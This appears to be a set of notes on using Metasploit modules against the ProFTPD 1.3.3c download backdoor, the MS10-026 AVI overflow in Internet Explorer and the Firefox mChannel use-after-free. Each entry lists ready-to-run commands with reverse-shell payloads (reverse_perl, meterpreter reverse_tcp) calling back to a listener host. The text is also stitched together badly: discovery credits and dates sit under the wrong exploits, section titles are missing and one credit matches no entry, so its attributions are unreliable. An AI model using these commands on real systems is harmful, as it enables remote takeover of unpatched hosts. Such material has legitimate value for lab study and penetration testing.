proftpd-1.3.3c from the dates of 2010-11-28 to 2010-12-02
Tested on Ubuntu 10.0.4 LTS with :
proftpd-1.3.3c patched with diff
Description :
This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.
Commands :
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability the 2010-04-13
Metasploit PoC provided the 2011-08-12
PoC provided by :
Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez
Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 6
Description :
This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0’s so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.
Commands :
use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10
Firefox 3.6.17 and bellow
Firefox 3.5.19 and bellow
Seamonkey 2.0.14 and bellow
Tested on Windows XP SP3 with :
Mozilla Firefox 3.6.16
Description :
This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.
Commands :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
Vulnerability discovered by Ray Slakinski & Jason McLeod
Public release of the vulnerability the 2005-03-10
Metasploit PoC provided the 2006-01-20 (not sure)